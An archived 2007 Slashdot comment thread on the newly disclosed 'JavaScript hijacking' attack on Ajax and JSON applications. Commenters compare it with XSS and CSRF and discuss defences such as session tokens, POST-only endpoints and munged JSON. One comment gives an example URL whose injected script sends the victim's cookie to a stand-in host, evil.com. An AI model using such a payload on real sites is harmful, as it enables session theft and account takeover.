Forgot your password?
typodupeerror
Security The Internet

Web 2.0 Under Siege 170

Posted by Hemos
from the in-dark-territory dept.
Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'"
This discussion has been archived. No new comments can be posted.

Web 2.0 Under Siege

Comments Filter:
  • XSS (Score:2, Interesting)

    by Anonymous Coward
    So, how is this different than Javascript injection or Cross-site Scripting?
    • Re:XSS (Score:5, Informative)

      by KDan (90353) on Monday April 02, 2007 @11:28AM (#18574367) Homepage
      I think the very subtle difference is that this time the calls are made using site A's public Ajax API, using site A's authentication token, but are made from a script sitting on site B. The javascript calls return with data from site A, which can then be handled by site B. XSS/JS Injection is more about injecting alien javascript onto site A to make site A call site B with the info it wants.

      Daniel
      • Re: (Score:1, Interesting)

        by Anonymous Coward
        Regarding regular XSS...

        XSS/JS Injection is more about injecting alien javascript onto site A ...

        OK so far.

        ... to make site A call site B with the info it wants.

        Darn, I thought it was to make site A execute code/retrieve infos from the user's system, not from another site :(

        Would you care to develop a little bit?

        • Re:XSS (Score:5, Informative)

          by KDan (90353) on Monday April 02, 2007 @11:58AM (#18574817) Homepage
          Sorry, I was writing this in a rush. I meant site A executes the code that was injected, retrieves the resulting data from site A, and then sends that data over to site B (or some other location). Typically this "data" is stuff like login information...

          Daniel
      • Another difference is that with a regular web app you'd have to insert the Javascript into multiple pages in order to have complete control over the target app. In order for there to be a danger to the user's data there'd have to be some data on the page where the Javascript was executed or you'd have to take the user to a custom-built phishing site to get them to enter their data for you. With an app written entirely in Javascript you'd only have to get your code executed once, and/or you wouldn't have to
    • Re: (Score:3, Informative)

      by Cigarra (652458)

      So, how is this different than Javascript injection or Cross-site Scripting?
      It is not. They just HAD to make it to Slashdot's front page.
    • Re: (Score:2, Informative)

      by Anonymous Coward
      This attack seems to be more like CSRF than XSS. You have authenticated to site A, you have a cookie to site A, you navigate to site B. In CSRF, site B performs a hidden form post to update and change information on your account. In this attack, site B performs cross site AJAX calls to steal, update, or change information on your account.

      --Anonymous Coward
  • by Nerdfest (867930) on Monday April 02, 2007 @11:25AM (#18574323)
    Sadly, this is likely to do very little to stop the use of the word 'mashups'.
    • Re: (Score:1, Offtopic)

      by omeomi (675045)
      The only use of the term Mashup that I'm familiar with is the music-oriented one [wikipedia.org]...I guess the "web 2.0" crowd needed another catchy buzzword. Hooray.
      • by Gilmoure (18428)
        I was wondering what this exploit had to do with the Pirates of Penzance crew singing that Baby Got Back song.
        • by omeomi (675045)
          Yeah, I'm somewhat disappointed that I got modded down for my comment...the adoption of new "web 2.0" oriented buzzwords is out of control...
    • by Seumas (6865)
      Or web 2.0.
      Or AJAX.

      Really, let it be the death of both. Too bad it's a couple years too late.
      • Re: (Score:3, Funny)

        by MikeFats (1024245)
        You're right - who doesn't yearn for the good old Pine and Gopher days? I spit on you AJAX and Web 2.0.
  • by Z0mb1eman (629653) on Monday April 02, 2007 @11:26AM (#18574329) Homepage
    How is this different from cross-site scripting?

    "In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."
    • by daviddennis (10926) <david@amazing.com> on Monday April 02, 2007 @11:36AM (#18574511) Homepage
      This is much harder to protect against than normal XSS. Why? Because the Ajax does not have to be executed from within the same domain.

      Let's say someone wants to attack my site, amazing.com. I browse to their site, remarkable.com, and the exploit code gets loaded into my browser. Remarkable.com can post to amazing.com using AJAX and receive replies as though they were authenticated on my site, because the browser automatically sends the amazing.com cookies with it when accessing an amazing.com URL. It appears to the browser fundamentally as though I was in remarkable.com and then typed the amazing.com URL on to the address bar.

      (Of course you could spoof the referer but not from an existing browser session so I think the referer can be relied on in this context.)

      If this is so, then it could truly be a throbbing migraine to fix - you would have to use the HTTP referer field to verify that the site calling your Ajax code was valid.

      Hope that helps. Not the cheeriest news this morning :-(, but hopefully Prototype will have some kind of fix, and life will go on.

      D
      • by Bogtha (906264) on Monday April 02, 2007 @11:47AM (#18574657)

        No, that kind of thing has always been possible since the very first implementation of JavaScript. If you don't need POST, then you can even do it with plain HTML 2.0, no JavaScript.

        The problem here is that JSON is a subset of JavaScript and so it is automatically parsed under the local domain's security context when it's included in a document with <script>. There's a few tricks to "hide" it even though it's already been parsed and is sitting in memory, I assume these guys have found a way around that.

      • Re: (Score:3, Interesting)

        by consumer (9588)
        Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer. There are some better techniques described in the Wikipedia XSRF entry.
        • Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer.

          In this case the client is the victim. Why would a client spoof Referer in order to attack itself?

          It's not perfect, but Referer checking should cover nearly all attacks of this sort.
          • by consumer (9588)
            Many browsers allow JavaScript to set the document.referrer property.
            • by nahdude812 (88157) *
              Even if so it wouldn't affect the HTTP request referrer header.

              Better than this is for the server to give the real page request a random token that is unique per session and which it uses for its ajax calls to verify that it's legitimate. The malicious website would have to guess or otherwise intercept which token had been sent. Remember, only the cookies are sent with the call, and the malicious site can't read the cookies, they can only use them. EvilSite.com site wouldn't be able to access other page
      • by jkauzlar (596349)
        So, I have an honest query for someone who seems knowledgeable about this... does this mean *all* use of AJAX is susceptible to this form of attack or just certain uses.. and in the case of the latter, then what is safe and what is not?
    • Re: (Score:2, Informative)

      by Anonymous Coward
      My thought exactly. More specifically, this sounds like a CSRF attack ( http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org] ).

      Such an attack previously succeeded on Digg (in the form of a white-hat demonstration of a self-Digging website), but that vulnerability has already been patched. The description of the demo attack, which they also refer to as "session riding," is available here: http://4diggers.blogspot.com/ [blogspot.com]
    • Re: (Score:3, Insightful)

      by michaelmalak (91262)
      Cross-site scripting allows a web page browsed by a socially engineered victim to be transmitted to the culprit. JavaScript hijacking is more powerful -- it allows arbitrary data stored on a server (e.g. an entire address book or even all of a user's e-mail on a webmail system) to be transmitted to the culprit.
      • by kestasjk (933987) *
        XSS is a vague term, but lots of people would put "JavaScript hijacking" under the same umbrella as XSS. Your typical XSS attack involves injecting JavaScript into the target domain (this may involve social engineering the victim into going to a url which will inject the JavaScript, eg http://friendly.com/?var=image.src='http://evil.c o m/'+document.cookie [friendly.com] ).

        If you can inject the JavaScript needed to do this you can usually also get it to read webmail etc. I won't repeat the things given by others that di
  • XSRF (Score:2, Interesting)

    by Anonymous Coward
    How is this different than Cross Site Response Forgery?

    http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org]
  • quick! (Score:5, Funny)

    by mastershake_phd (1050150) on Monday April 02, 2007 @11:30AM (#18574407) Homepage
    Upgrade to Web 3.0, quick!
  • Duh (Score:3, Informative)

    by evil_Tak (964978) on Monday April 02, 2007 @11:34AM (#18574465)
    This has been around for (web) ages. As stated in the summary, it's used all over the place to create mashups because it's one of the only ways around the security requirement that XmlHttpRequest can only talk to the originating server.
  • Mashups? (Score:5, Funny)

    by Rob T Firefly (844560) on Monday April 02, 2007 @11:36AM (#18574509) Homepage Journal

    'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'
    So back when I made the Beastie Boys rap over the Macarena tune, [spacemutiny.com] I was really hacking the Web 2.0? And here I thought I was just assaulting eardrums and good taste...
  • by zappepcs (820751) on Monday April 02, 2007 @11:37AM (#18574523) Journal
    that we can sue Morfik? /sarcasm
  • Where's the problem? (Score:5, Interesting)

    by pimterry (970628) on Monday April 02, 2007 @11:39AM (#18574557)
    "In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

    So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

    AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages. AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication.

    Where's the problem? (What am i missing?)

    PimTerry
    • by TheSunborn (68004) <tiller@[ ]mi.au.dk ['dai' in gap]> on Monday April 02, 2007 @11:49AM (#18574683)
      The problem is your statement that "AJAX needs no continual session"

      AJAX really do need sessions. Just think of Gmail. It it a single AJAX session starting when you login, and finishing when you logout or timeout.

      If AJAX don't use sessions, it would have to authenticate itself with username and password with each request it made to the server.

      An better solution might be to let the AJAX application explicit handle sessions by storing the session id, and sending it in the post part of all it's requests. But that might be a problem with the browsers history, because it would then loose your session id, if you used the back button.
      • by daeg (828071)
        Why would it need to reauthenticate with each AJAX request? You can easily just append the session token to the end of your POST (or GET) requests. It goes over the wire in cleartext anyway. All AJAX apps should be using SSL anyway.

        You don't run into this specific problem if you do that. New windows with the same domain name (e.g., gmail.com) don't share the same memory as the original window, thus it won't have the authentication token, and won't have the active cookie, either.
    • Re: (Score:2, Informative)

      by ergo98 (9391)

      But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript.

      Store then in javascript? Huh?

      It is completely normal -- across the entire industry -- to store session identifiers in cookies. There is nothing special or AJAXy about that.
    • by misleb (129952)

      So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

      Well, for one thing, AJAX isn't an all or nothing deal. Many sites/app

    • If you need to store authentication (User session id's etc), store them in a variable within the javascript.

      So what then, you pass the userid, sessionid, etc via the querystring? I don't that is making things more secure.

      The problem here is that at some point the service has to cough up the data to the caller. If the caller has malicious intent, then what can you do? Meditate on this, I shall. That, or wait for prototype to fix it.
    • If I'm reading the Fortify paper right (I'm in a noisy environment), they say that your proposal will work. The attack is a variation on CSRF, so a similar solution (shared secret nonce) applies.

      Things like this are why I have fun in security. Leveraging execute-only access to code into read access to data is a nifty hack.
  • Shirky's Law: (Score:5, Interesting)

    by sakusha (441986) on Monday April 02, 2007 @11:43AM (#18574613)
    "Social Software is stuff that gets spammed."

    The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.
  • by jeevesbond (1066726) on Monday April 02, 2007 @11:46AM (#18574651) Homepage
    I really hope it is. There's no such thing as Web 2.0, some arse decided to put a label on the natural progression the Web was undertaking anyway. It's annoying when authors write that some entirely new, completely re-written version of the Web is--suprisingly--vulnerable, it's the same old Web, just with some new buzz-words.

    This is a vulnerability that appears only when passing Javascript between client and server. An attacker has to get a potential-victim who is logged-in to a site, that uses the JSON format to exchange data using AJAX, to visit a page they've setup. Then the attacker can intercept the data as it travels between client and server, a man in the middle attack. From the article:

    In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker.

    So it's a known method of attack, but because it's aimed at web sites using AJAX it has to be labelled 'Web 2.0'. Ugh.
  • by slashkitty (21637) on Monday April 02, 2007 @11:47AM (#18574661) Homepage
    It was reported as a problem with the google address book. These guys just generalized the problem because they saw it in many places.

    It actually could be pretty nasty. I think the only solution is for you to pass authenticated tokens through the url or input parameters (not through cookies).

    It might be a good time to use the firefox NoScript plugin if you're not using it already. Only allow javascript on sites you trust.

  • Easy Fix (Score:2, Funny)

    by Anonymous Coward
    Just serve up an animated cursor before any XML handshakes. This will stop the attackers from exploiting the AJAX piece.

  • I think the article is a bit exaggerated but if the idea that "Web 2.0" is under attack might be a good time to look at this problem. Consider that a lot of people only surf a few websites (get some news, etc) and use e-mail. Most people don't use the net for anything more.

    So if I only visit about 10 websties daily and those 10 sites I'm reasonably sure are safe why would I go anywhere else if it could cause problems to my computer? I've seen and heard from a lot of people fed-up with spyware, adware and vi
    • Re: (Score:2, Insightful)

      by orclevegam (940336)

      All very well and good until one of those ten gets infected by something nasty. I seem to recall seeing an article recently where a big site like CNN or one of them got hit by a worm and was actually serving up infected pages for 48 hours or so till it was discovered and cleaned out. The solution is not to rely on the servers being secure (although that can't be ignored either if you're securing the servers), but to ensure that even IF the servers are compromised that you arn't vulnerable.

      As much as I hate

      • True enough. I just thought I'd throw the idea out. And several banks and as you mention popular sites like CNN haven't escaped hackers. I didn't want to exclude that argument either.

        But yeah, hardened OSes using SELinux or OpenBSD or Vista even are steps in the right direction to address this problem.
  • From TFA..

    Everybody thought that the rise of Ajax as a web programming model would merely exacerbate existing types of attack. Few thought it would give rise to a new class, noted (some random guy).

    Actually, I'd claim "everybody" with a toe in the security world thought it was the opposite; we'd start hearing about daily/weekly Ajax security problems as a regular course of business.

    (If you think various operating systems have legacy code problems; you don't know "Javascript as implemented by browsers"...)

  • by Sam Legend (987900) on Monday April 02, 2007 @12:24PM (#18575173)
    The biggest WTF is that somebody is still using javascript. Oops. Wrong site...
    (Captcha: backtotheweb1.0)
  • by robby_r (1082023) on Monday April 02, 2007 @12:27PM (#18575207)
    All: I encourage all of you to read the detailed report Fortify wrote on this topic. Its written for developers and explains the problem in clear technical detail. http://www.fortifysoftware.com/advisory.jsp [fortifysoftware.com] (No registration required) Its a long document but I doubt you'll have a lot of questions after reading it. Its refreshing to see reports written like this that don't insult a developer's intelligence.
  • sigh (Score:5, Insightful)

    by CrazyBrett (233858) on Monday April 02, 2007 @12:33PM (#18575309)
    This just sounds like a fancy Cross-Site Request Forgery.

    I still maintain that the collective blindness to these security issues comes from our absolute refusal to see HTTP requests as function calls. This is partly due to the silly ideology of the REST crowd.

    Rephrase the situation as follows and see if this doesn't make you pee your pants: "Any site can instruct your browser to execute an arbitrary function on another site using your authentication credentials."
    • Re:sigh (Score:4, Interesting)

      by julesh (229690) on Monday April 02, 2007 @01:51PM (#18576547)
      This just sounds like a fancy Cross-Site Request Forgery.

      That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.

      The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.

      The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want? :)
      • by Rich0 (548339)
        I'm still a bit puzzled about why they allow this kind of cross-site interaction in the security model. Shouldn't the sandbox be designed to not allow code on different html files to interact, or to only interact if they were loaded from the same site? And shouldn't the sandbox only allow TCP connections back to the site from which the code came from - and that includes connections created by loading URLs as well. I can see allowing redirections of the entire webpage (ie what is in the location bar), but
        • by julesh (229690)
          There are probably solutions to this as well (don't allow GET/POST of form variables on redirects, don't allow redirecting at all across domains, don't design web apps with such simple interfaces that can be guessed).

          The solution to this requires steps on behalf of both app designers and browser designers:

          * Pages that perform potentially harmful actions should only accept data that is POSTed, not URL parameters. Or require a two step process: first request displays a confirmation page, second page will onl
  • by Anonymous Coward on Monday April 02, 2007 @12:39PM (#18575393)
    An application may be vulnerable if:

    - It uses cookies to store session IDs or other forms of credentials; and
    - It sends data from server to browser using "JSON" notation; and
    - It doesn't require POST data in each request.

    A vulnerable application can be fixed by changing any of these three aspects:

    - Stop using cookies, and instead supply the credentials in the request's URL or POST data.
    - Don't use JSON, or munge your JSON so that it can't be run directly from within a <script> tag; for example, you could put comments around it in the server and strip them off in your client.
    - Have the client send some POST data and check for it on the server (a <script> tag can't send POST data).

    My preference, and the strategy that I've used in Anyterm and Decimail Webmail, is to not use cookies. To me it actually seems easier to put the session ID in the request, rather than to mess around with cookies.

    The advisory, which explains it all but is a bit waffly at the start, is at http://www.fortifysoftware.com/servlet/downloads/p ublic/JavaScript_Hijacking.pdf [fortifysoftware.com]
  • by unity100 (970058) on Monday April 02, 2007 @12:44PM (#18575467) Homepage Journal
    If you delegate operations and processes to client side, sooner or later they will be finding more ways to exploit it to an extent that it would be a security risk to offer such client side stuff, making anti-virus, anti-spyware, privacy product manufacturers more agitated about it, and in the end drawing visitors away from your site due to blocks, issues, and fear.
  • by Animats (122034) on Monday April 02, 2007 @12:50PM (#18575577) Homepage

    XML is now so last week. Really l33t web apps use JSON, which is yet another way to write S-expressions like those of LISP, but now in Javascript brackets.

    There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org]. Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole. Second, there's an attack similar to the ones involving redefining XMLHttpRequest: redefining the Array constructor. [getahead.org] (Caution, page contains proof of concept exploit.)

    The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable. It's not clear how to allow "mashups" and prevent this. The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

    As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

    • I'll ignore the debunked *XML is S-expressions* bait for the chance to second your critique of JavaScript and the inherent problems with the AJ part of AJAX.
    • by julesh (229690) on Monday April 02, 2007 @02:08PM (#18576797)
      There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval". Now that was dumb.

      You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"

      The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.

      Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-security -risk"; document.body.appendChild (e);', which I've seen many scripts do) how can another site redefine the objects in my script? I think the vulnerability is that most JS programmers are too willing to let other sites execute arbitrary code in their own context, which really ain't good.

      The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

      The fix seems obvious to me:

      * cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.

      * XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user for the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.

      As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

      Scripts, yes. I don't see the need to ensure that data originates in the same domain.
    • >First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org]. Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole.

      Isn't this the same lesson that led to giving up on suid shell scripts? Try to "filter" input to a rich general-purpose language and you always miss something. Especially when the language can be tweaked at runtime, be it with an IFS environment vari
  • AKA, the security programmer's favorite adage: "The user is the enemy."

    That is, when ANY new technique or code module is to be used in a production environment, it should not be considered ready until it has been thoroughly attacked by a person who has the kind of mind-set that will expose code vulnerabilities before a user (or set of users) finds them.

    Trouble is, most IT organizations have a hard sell to get that type of person within the company -- first, because an "inside the firewall" attacker is count

  • First the MS cursor exploit [slashdot.org], now this. How are we supposed to surf the web, anymore? That's it! I'm going back to Morse Code:
    _-_- ___ __ - __- - _ --- ___ __ - --- _ ___ -__-

  • Are there any working examples of this problem we could see? I'm having trouble understanding exactly what the issue is supposed to be.
  • “Web 2.0” is not AJAX and “AJAX” is not Web 2.0. These terms are not synonyms nor does one necessarily imply the other. Yes, AJAX is an important participant, but Web 2.0 is really about service architecture [oreillynet.com] that is equally consumable by machines and people—a notion that somewhat embodies the original vision of the Web. The article title “Web 2.0 Under Siege” is misleading nonsense. It is analogous to stating that programming is “under siege” because

  • What a crock. This has got zero to do with ajax. For example, even with 'insecure' PHP - the first line of any backend ajax code should read something like ..

    require_once("include/session.inc");

    Where session.inc reads the user cookie (or whatever the authentication mechanism your app uses), and sets up a validated user.

    There is NO DIFFERENCE in the way users are authenticated between server side code that renders a regular page, and server side code that is called by ajax. One generally returns HTML, the ot
  • ASP.NET Ajax [asp.net], with the default settings, is protected [asp.net] against these attacks.

Never trust an operating system.

Working...